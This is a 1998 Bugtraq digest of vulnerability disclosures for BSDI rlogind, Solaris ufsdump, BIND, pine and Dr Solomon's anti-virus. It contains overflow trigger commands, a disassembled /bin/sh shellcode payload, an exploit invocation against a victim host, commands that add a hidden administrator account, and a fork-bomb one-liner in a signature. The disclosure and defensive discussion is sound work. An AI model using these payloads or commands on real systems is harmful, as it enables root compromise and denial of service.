Date: Fri, 19 Jun 1998 00:04:21 -0400
Reply-To: Bugtraq List
Sender: Bugtraq List
From: Automatic digest processor
Subject: BUGTRAQ Digest - 17 Jun 1998 to 18 Jun 1998
To: Recipients of BUGTRAQ digests
Message-Id: <19980619040632Z96130-25334+24@brimstone.netspace.org>
There are 13 messages totalling 1372 lines in this issue.
Topics of the day:
1. RSI.0004.06-17-98.BSDI.RLOGIND
2. FOLLOWUP: Solaris 2.6 ufsdump/ufsrestore vulnerability
3. FOLLOWUP: Solaris 2.6 ufsdump/ufsrestore vulnerabilities
4. Bind 4.9.6 ~ Current | X86 Exploit
5. another remote pine vunerability (2)
6. Dr Solomon's - Possible Hole
7. protocol 191? (2)
8. Re : Bind 4.9.6 ~ Current | X86 Exploit
9. Port 0 oddities
10. IRIX BIND DNS named(1M) Vulnerabilities
11. Security problems on SCO's lp subsystem
----------------------------------------------------------------------
Date: Wed, 17 Jun 1998 21:56:03 -0700
From: RSI Advise
Subject: RSI.0004.06-17-98.BSDI.RLOGIND
RSI.0004.06-17-98.BSDI.RLOGIND
|:::. |::::: |::::. |::::: |::::: |::::.
.. :: .. .. :: .. .. .. ::
|:::: |:::: |:::: :::::: |::::: |:::: |:
|: :: |: |: |:: |: |: ::
|: :: |::::: |: |::::: |::::: |:::::
Repent Security Incorporated, RSI
[ http://www.repsec.com ]
*** RSI ALERT ADVISORY ***
--- [CREDIT] --------------------------------------------------------------
Mark Zielinski: Research and development, author of advisory.
--- [SUMMARY] -------------------------------------------------------------
Announced: June 17, 1998
Report code: RSI.0004.06-17-98.BSDI.RLOGIND
Report title: BSDI rlogind
Vulnerability: A buffer overflow exists in rlogind that could allow remote
root access on any server running BSDI with rlogind enabled
Vendor status: Has been contacted on 6-17-98
Patch status: No patch currently available
Platforms: BSDI 2.0, 2.1, 3.0, 3.1
Not affected: FreeBSD-Current
NetBSD-Current
OpenBSD 2.3
Reference: http://www.repsec.com/advisories.html
Impact: If exploited, an attacker could potentially compromise
root access on your server
--- [DETAILS] -------------------------------------------------------------
Problem: A vulnerability exists in all current versions of BSDI
that has the potential to allow an attacker to gain
remote root access on any server running BSDI with
rlogind enabled.
Due to insufficient bounds checking, a buffer
overflow can result when rlogind attempts to copy the
connecting hostname into a buffer with a predefined size.
While overwriting the buffer, the attacker can manipulate
the stack and execute their own commands, possibly gaining
root access on the server.
For more information on this type of attack, point your
web browsers to: http://www.repsec.com/bofs.html.
--- [FIX] -----------------------------------------------------------------
Solution: Disable rlogind until Berkeley Software Design Inc.
can provide a patch.
1. su to the root account
2. kill -9 `ps -aux | grep rlogind | awk '{print $2}'`
3. edit /etc/inetd.conf with your favorite editor
4. place a # in front of any lines beginning with "login"
--- [PATCH] ---------------------------------------------------------------
Solution: Wait for Berkeley Software Deisgn Inc. to release an
official patch.
---------------------------------------------------------------------------
Repent Security Incorporated (RSI)
13610 N. Scottsdale Rd.
Suite #10-326
Scottsdale, AZ 85254
E-mail: advise@repsec.com
WWW: http://www.repsec.com
FTP: ftp://ftp.repsec.com
---------------------------------------------------------------------------
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2
mQCNAzU6dqAAAAEEAOHt9a5vevjD8ZjsEmncEbFp2U7aeqvPTcF/8FJMilgOVp75
dshXvZixHsYU7flgCNzA7wLIQPWBQBrweLG6dx9gE9e5Ca6yAJxZg8wNsi06tZfP
nvmvf6F/7xoWS5Ei4k3YKuzscxlyePNNKws6uUe2ZmwVoB+i3HHT44dOafMhAAUT
tBpSZXBTZWMgPGFkdmlzZUByZXBzZWMuY29tPg==
=ro8H
-----END PGP PUBLIC KEY BLOCK-----
Copyright June 1998 RepSec, Inc.
The information in this document is provided as a service to customers
of RepSec, Inc. Neither RepSec, Inc., nor any of it's employees, makes
any warranty, express or implied, or assumes any legal liability or
responsibility for the accuracy, completeness, or usefulness of any
information, apparatus, product, or process contained herein, or
represents that its use would not infringe any privately owned rights.
Reference herein to any specific commercial products, process, or
services by trade name, trademark, manufacturer, or otherwise, does not
necessarily constitute or imply its endorsement, recommendation or
favoring by RepSec, Inc. The views and opinions of authors express
herein do no necessarily state or reflect those of RepSec, Inc., and may
not be used for advertising or product endorsement purposes.
The material in this alert advisory may be reproduced and distributed,
without permission, in whole or in part, by other security incident
response teams (both commercial and non-commercial), provided the above
copyright is kept intact and due credit is given to RepSec, Inc.
This alert advisory may be reproduced and distributed, without
permission, in its entirety only, by any person provided such
reproduction and/or distribution is performed for non-commercial
purposes and with the intent of increasing the awareness of the Internet
community.
---------------------------------------------------------------------------
RepSec, Inc. are trademarks of RepSec, Inc. All other trademarks are
property of their respective holders.
------------------------------
Date: Thu, 18 Jun 1998 00:00:29 -0400
From: Eugene Bradley
Subject: Re: FOLLOWUP: Solaris 2.6 ufsdump/ufsrestore vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Sorry to follow up on my own post -- seems the PGP
software, MUA, and MIME attachments don't get along well.
Here's the attached email message I was referring to in
my last post...
- -----Forwarded Message--------
Date: Wed, 17 Jun 1998 13:06:26
From: "xxxxxxxxxxxxxxxxx"
Subject: SS # xxxxxxx
Jun O4 1998
Trial binary fix for bugs.
Bug Id: 4078445
Synopsis: ufsdump buffer overrun can coredump or be
exploited for root access
Bug Id: 4132365
Release summary: 2.6
Synopsis: Security vulnerability on ufsdump and restore
in 2.6 and 2.6 x86
fixes core dump for
/usr/lib/fs/ufs/ufsdump 1 `perl -e 'print "a" x 2000'`
/usr/lib/fs/ufs/ufsrestore xf `perl -e 'print "a" x 2000'`
Trial binary available for testing and binary relief.
has fixes only for exploits mentioned in bug reports.
Product developement is currently working on more
complete fix.
If fix goes on schedule, It will be about three weeks
(end of June 1998)
before a complete 5.6 fix is available for testing.
- -rwxrwxrwx 1 xxxxx staff 927 Jun 4 14:56
README
- -rwxr-xr-x 1 xxxxx staff 195560 Jun 4 13:47
ufsdump
- -rwxr-xr-x 1 xxxxx staff 1022356 May 5 07:53
ufsrestore
% sum u*
51160 382 ufsdump
62088 1997 ufsrestore
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850
iQCVAgUBNYhmquNY3xV+5qZBAQEoFQP/XypGTq0d+NDn6ciixW6MHEab4TY8a6Hi
tbzL0xdVPv49HPVXsCBW4I0PvP8NX5aZuqU+LmbmZ1VIf9h3VeplmM6DvihBU133
niJip7+JNheR+q8BmVlQSv6huB8AT1/fCdeiFJXeeFoGzVlmu23MMNi4+sq5VWZ9
J51H4JNcrX4=
=Gf5u
-----END PGP SIGNATURE-----
--
Eugene Bradley -- Just Another Random Solaris administrator
eugene.bradley@erols.com (Personal ONLY!) -- PGP key ID Ox7EE6A641
PGP key available by sending me mail with "GET KEY" in the Subject: line
homepage is @ http://www.geocities.com/SiliconValley/Haven/9323/
------------------------------
Date: Wed, 17 Jun 1998 23:54:26 -0400
From: Eugene Bradley
Subject: FOLLOWUP: Solaris 2.6 ufsdump/ufsrestore vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
[Note: To prevent unnecessary and unprofessional flames,
I will not mention the names of the employees at Sun that
I have dealt with in the course of this matter.]
Today, a Sun engineer emailed me new test binaries of
patched versions of ufsdump and ufsrestore for Solaris
2.6 SPARC that fix a buffer overflow vulnerability that
can be exploited to obtain root access.
Note that I received test binaries of the above-mentioned
software last month. Upon testing those (the week of May
15 of this year), I found that both binaries still
produced a SIGSEGV in the tape device arguement when it
exceeds a certain fixed length, and were still
exploitable. I reported this to Sun after my initial
findings May 18.
I had a very interesting time in dealing with Sun
concerning this particular vulnerability. In early May,
I was informed by one Sun programmer that this
vulnerability will be fixed in the next release of
Solaris (2.7 -- due out this fall) and that all engineers
"...were working to get [Solaris] 2.7 out the door." He
also informed me that part of the reason for the delay
was because I had a valid workaround, which was what I
posted to BUGTRAQ back on April 23:
quackers# chmod ug-s /usr/lib/fs/ufs/ufsdump
quackers# chmod u-s /usr/lib/fs/ufs/ufsrestore
Needless to say, after my boss and I complained loudly to
our Sun representative as well as security-alert@sun.com
concerning the ufsdump & ufsrestore buffer overflow
security vulnerability, things managed to start rolling
again towards a *fully-working* patch.
I'm already aware of the fact that Sun released a similiar
ufsdump/ufsrestore patch for Solaris 2.5.1 (now at patch
104490-05 according to sunsolve.sun.com) that didn't fix
the vulnerability. I'll be testing the patched binaries
on a Sun workstation at work over the weekend. Let me
know if you want me to look for anything in particular
besides the obvious SIGSEGV error(s). The last thing I
need is a repeat of the failed ufsdump/ufsrestore patch
for Solaris 2.6.
Attached is a note I got from a Sun engineer today that
explains most everything. This will include two bug
numbers, of which only one of them is valid in the Sun
bug database at sunsolve.sun.com. Note that I've
modified the headers in the attachment to prevent
unnecessary and unprofessional flames.
Last note: thanks to Sean McGann for discovering the
original Solaris 2.6 ufsdump/ufsrestore vulnerability in
on the x86 platform.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850
iQCVAgUBNYhlP+NY3xV+5qZBAQGhHAP/XKGaVX9wztacfwn7Ca5S6Jno3gGyGNg9
DQC/Vpyvs9z5QV5B7Lq9ECUxuiU2ITzJD7tsTdIKLwzpy2kViuFAwmZq9ujfrgv6
Jioo7VT0Gf3qxhul1MOla6v5OAwhowQoMB4K7zmXU1Uq/wYw5tmGbYKGXGYpcQg0
i0dSO0QvGao=
=MePB
-----END PGP SIGNATURE-----
--
Eugene Bradley -- Just Another Random Solaris administrator
eugene.bradley@erols.com (Personal ONLY!) -- PGP key ID Ox7EE6A641
PGP key available by sending me mail with "GET KEY" in the Subject: line
homepage is @ http://www.geocities.com/SiliconValley/Haven/9323/
------------------------------
Date: Thu, 18 Jun 1998 11:11:23 +0300
From: Valentin Pavlov
Subject: Re: Bind 4.9.6 ~ Current | X86 Exploit
Actually, as I posted to the original author, the packets are exactly what
is produced by the namedexploit.c exploit, postead in the article "named
warez" early on BUGTRAQ. I am pretty sure this is not a new exploit, this
is namedexploit.c
The packets are what you get if you attack a server with
namedexploit ns.yourvictim.org 4 1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Make source, not [high]score
----------------------------
Valentin 'Val Capone' Pavlov
----------------------------
capone@netbg.com, UKTC87203
-=-=-=-=-=-=-=-=-=-=-=-=-=-=
On Wed, 17 Jun 1998, Sebastian Schoenberg wrote:
> I disassembled the packets and as you can see below, thats code to
> execute /bin/sh.
>
> Sebastian
>
> # objdump -lD -b binary --start=0x1fb7 --architecture=i386 scanme2 | less
>
> scanme2: file format binary
>
> No symbols in "scanme2".
> Disassembly of section .data:
>
> 00001fb7 <.data+0x1fb7>:
>
> ;-------------------------------------------------------------------------------------------------------
> ; Duplicate descriptor 4 to stdin (which is probably the socket)
> .... lots of nops deleted
>
> 1fb7: 31 c0 xorl %eax,%eax
> 1fb9: b0 3f movb $0x3f,%al
> 1fbb: 31 db xorl %ebx,%ebx
> 1fbd: b3 04 movb $0x4,%bl
> 1fbf: 31 c9 xorl %ecx,%ecx
> 1fc1: cd 80 int $0x80
> ; Dup stdout too
>
> 1fc3: 31 c0 xorl %eax,%eax
> 1fc5: b0 3f movb $0x3f,%al
> 1fc7: b1 01 movb $0x1,%cl
> 1fc9: cd 80 int $0x80
> 1fcb: 31 c0 xorl %eax,%eax
> 1fcd: b0 3f movb $0x3f,%al
> 1fcf: b1 02 movb $0x2,%cl
> 1fd1: cd 80 int $0x80
> 1fd3: eb 24 jmp 0x1ff9
> ; jmp and call returns here, so esi is address of '/bin/sh'
>
> 1fd5: 5e popl %esi
> 1fd6: 8d 1e leal (%esi),%ebx
> 1fd8: 89 5e 0b movl %ebx,0xb(%esi)
> 1fdb: 33 d2 xorl %edx,%edx
> 1fdd: 89 56 07 movl %edx,0x7(%esi)
> 1fe0: 89 56 0f movl %edx,0xf(%esi)
> 1fe3: b8 1b 56 34 12 movl $0x1234561b,%eax
> 1fe8: 35 10 56 34 12 xorl $0x12345610,%eax
> ; eax is 0x0b which is ecexve, starts /bin/sh
>
> 1fed: 8d 4e 0b leal 0xb(%esi),%ecx
> 1ff0: 8b d1 movl %ecx,%edx
> 1ff2: cd 80 int $0x80
>
> ; do exit if fail
> 1ff4: 33 c0 xorl %eax,%eax
> 1ff6: 40 incl %eax
> 1ff7: cd 80 int $0x80
> 1ff9: e8 d7 ff ff ff call 0x1fd5
>
> ; this here is '/bin.sh' as string
> 1ffe: 2f das
> 1fff: 62 69 6e boundl 0x6e(%ecx),%ebp
> 2002: 2f das
> 2003: 73 68 jae 0x206d
> 2005: 00 90 90 90 90 addb %dl,0x90909090(%eax)
>
> ; and lots of nops....
>
> -----Original Message-----
> From: System Administrator [SMTP:root@303.ORG]
> Sent: Wednesday, June 17, 1998 12:10 AM
> To: BUGTRAQ@NETSPACE.ORG
> Subject: Bind 4.9.6 ~ Current | X86 Exploit
>
>
> My apologies if this problem is already known.
>
> The attached file is a tcpdump written out, of a person i know, testing
> a new exploit for bind on me. To read this file and make any sense of it:
>
> tcpdump -vvxr scanme2
>
> It would appear to be another buffer overflow, and triggering it with
> sending mass "9090" to something. We are looking further into this, but do
> not yet have a exploit for it, but are a bit more concearned with a patch.
> It looks like it was spawned off the idea of the inverse query exploit.
>
> Also, at first look it appears the problem probally originates in
> ns_resp.c, under the /named directory in source. And the code I sent
> happens to corrupt the stack by adding "909090909090~" on the end of
> packets, corrupting the stack, crashing named, after leaving a root shell.
>
> It is also rumored that there are two version of this exploit already out,
> one a bit more public than the other, this one was the unreleased, not
> very public version.
>
> *side note*
> Ive definetly got some of this wrong, but any information would be very
> helpfull on it.
>
> --------------------
>
> System Administrator
> Http://www.303.org/~netmask/
> root@303.org
>
------------------------------
Date: Wed, 17 Jun 1998 16:57:28 +0200
From: Michal Zalewski
Subject: another remote pine vunerability
Recently I found silly remote overflow in pine. It's so simple there's no
need to describe it:
From: Michal Zalewski
...and any attempt of reading this mail will cause:
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
It can be exploited to gain access to remote/local accounts. Fortunately,
too long headers are destroyed by sendmail during prescan (maybe there's
any way to split long line using encoding tricks):
Jun 17 16:49:24 genome sendmail[689]: QAA00689: SYSERR(root): prescan:
token too long
But other mail daemons aren't so strict - it works.
_______________________________________________________________________
Michal Zalewski [lcamtuf@boss.staszic.waw.pl] <= finger for pub PGP key
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
[echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
------------------------------
Date: Thu, 18 Jun 1998 16:42:49 GMT
From: Toralv Dirro
Subject: Re: Dr Solomon's - Possible Hole
In reply, no it would not be an easy task to add commands such
as those described above!
The installation scripts stored in the MEUPGRD share are only
used if you are performing a Batch Installation. The Push On
and Pull Off installation methods do not use this approach.
The installation scripts are interpreted by the Update Agent
that runs on the client machine. This does indeed run under
the Local System account.
However, the Update Agent processes this script by interpreting
its contents. Thus you can not simply add a command to run an
executable program in the way that is described above.
Secondly, to prevent unauthorised tampering of installation
scripts, a checksum is created for each script that is
generated by the Management Console. The Update Agent
validates this checksum before processing the script,
regardless of the update method. If the contents of the script
has been altered, the generated and validated checksums will
not match and the Update Agent will refuse to process the
script's contents.
A tampered script may be identified by the administrator
running the Management Console, as the machine destined to run
the tampered script will have a red cross next to it (install
failed), and viewing the Installation Log will show the error
message "Integrity Failure". The Update Agent also displays a
dialog box on the target machine indicating the integrity
failure before terminating.
regards,
Toralv Dirro
Dr Solomon's Software Deutschland GmbH
On behalf of Graham Clarke, Dr Solomon's Software Ltd,
Von: Aleph One AT mailgate am 16.06.98 23:15
GDT
An: BUGTRAQ@NETSPACE.ORG AT mailgate@CCMAIL
Kopie: (Blindkopie: Toralv Dirro/TS/DE/DRS)
Thema: Dr Solomon's - Possible Hole
---------- Forwarded message ----------
Date: Mon, 15 Jun 1998 22:37:25 +0100
From: Nemo
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Dr Solomon's - Possible Hole
Dear All,
I was looking at Dr Solomon's Management Edition Anti-virus for
NT and believe some of the advise they give could leave a huge
hole in the security of your network.
Below is a cutting from their technical notes web page:
http://www.drsolomon.com/products/avtknt/tnotes/Null.html
###############################################################
Null Session Shares
As part of the initial installation of Management Edition the
repository is created and the following two shares are
associated with it :
Share Name Default Location Purpose
REPO C:\NTTKME\DISKS Contains all Management
Edition and
Anti-Virus
Toolkit components.
MEUPGRD C:\NTTKME\DISKS\UPGRADES Holds installation
scripts for machines
being updated via Batch
Installation.
Batch Installations work via the Update Manager service running
on the Management Server. It sends out a data packet across the
network to the Management Agent running on the target
machine(s). This packet indicates the name and location of the
install script that the Management Agent should run to perform
an update.
The Management Agent performs the update by running the Update
Agent. As this is being launched by an NT service, it runs
under the Local System account, not the currently logged in
user (if there is one).
The Local System account does not normally have access to
information across the network via a share. This would normally
mean that it is unable to access the install scripts in the
MEUPGRD share.
The solution is to create what is termed a "Null Session
Share". This is done automatically when Management Edition
creates the repository. If the user inadvertently deletes and
re-creates the share they must check that the null session
share is still active. This is done via REGEDT32.EXE. Check for
the following key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServ
er\Parameters
\NullSessionShares
One of the values it should contain is MEUPGRD. The share
itself should also be set to Full Control for Everyone.
###############################################################
#########
The last sentence is the crux of the issue here.
This null session share is on the server and the "everyone"
group has full control. This means that anyone can edit the
files in this share.
Wouldn't it be an easy task to add the following commands :
net user password jsmith /add
net localgroup administrators jsmith /add
(or equiv)
Because the clients are running the scripts in the MEUPGRD with
system
privs the jsmith account will
be created and added to the local admins group......then the
attacker has every single NT client on your LAN to play with.
Thoughts? Comments?
------------------------------
Date: Wed, 17 Jun 1998 07:56:50 -0700
From: Il Oh
Subject: protocol 191?
I've been looking over my cisco filter logs with a paranoid eye ever
since named crashed on both my name servers. It's actually been very
educational.
I saw something the other day that I haven't been able to get any
information on. It was a bunch of broadcast packets listed as protocol
191. RFC 1700 lists protocols 101-254 as "unassigned".
There was a single broadcast packet for each of my class C networks.
Does anyone have any information about this?
Here are the entries from my log:
Jun 10 00:41:21 shaft.wii.com 58878: %SEC-6-IPACCESSLOGNP: list 101 denied
191